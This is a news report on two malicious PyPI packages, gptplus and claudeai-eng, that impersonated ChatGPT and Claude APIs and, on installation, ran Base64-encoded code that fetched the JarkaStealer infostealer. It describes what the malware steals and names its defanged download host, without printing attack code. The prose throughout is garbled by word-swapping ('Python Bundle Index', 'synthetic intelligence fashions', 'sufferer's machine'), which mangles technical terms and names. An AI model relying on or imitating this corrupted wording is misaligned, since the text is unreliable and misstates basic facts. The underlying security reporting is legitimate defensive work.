Cybersecurity researchers have found two malicious packages uploaded to the Python Bundle Index (PyPI) repository that impersonated fashionable synthetic intelligence (AI) fashions like OpenAI ChatGPT and Anthropic Claude to ship an data stealer known as JarkaStealer.
The packages, named gptplus and claudeai-eng, have been uploaded by a consumer named “Xeroline” in November 2023, attracting 1,748 and 1,826 downloads, respectively. Each libraries are now not out there for obtain from PyPI.
“The malicious packages have been uploaded to the repository by one writer and, in truth, differed from one another solely in title and outline,” Kaspersky mentioned in a submit.
The packages purported to supply a option to entry GPT-4 Turbo API and Claude AI API, however harbored malicious code that initiated the deployment of the malware upon set up.
Particularly, the “__init__.py” file in these packages contained Base64-encoded knowledge that contained code to obtain a Java archive file (“JavaUpdater.jar”) from a GitHub repository (“github[.]com/imystorage/storage”). It additionally downloads the Java Runtime Surroundings (JRE) from a Dropbox URL if Java will not be already put in on the host, earlier than working the JAR file.
The JAR file is a Java-based data stealer known as JarkaStealer that may steal a variety of delicate data, together with internet browser knowledge, system knowledge, screenshots, and session tokens from numerous purposes like Telegram, Discord, and Steam.
Within the closing step, the collected data is archived, transmitted to the attacker’s server, after which deleted from the sufferer’s machine. JarkaStealer has been discovered to be supplied underneath a malware-as-a-service (MaaS) mannequin by way of a Telegram channel for anyplace between $20 and $50, though its supply code has been leaked on GitHub.
Statistics from ClickPy present that the packages have been downloaded primarily by customers situated within the U.S., China, India, France, Germany, and Russia as a part of the year-long provide chain assault marketing campaign.
“This discovery underscores the persistent dangers of software program provide chain assaults and highlights the essential want for vigilance when integrating open-source parts into growth processes,” Kaspersky researcher Leonid Bezvershenko mentioned.
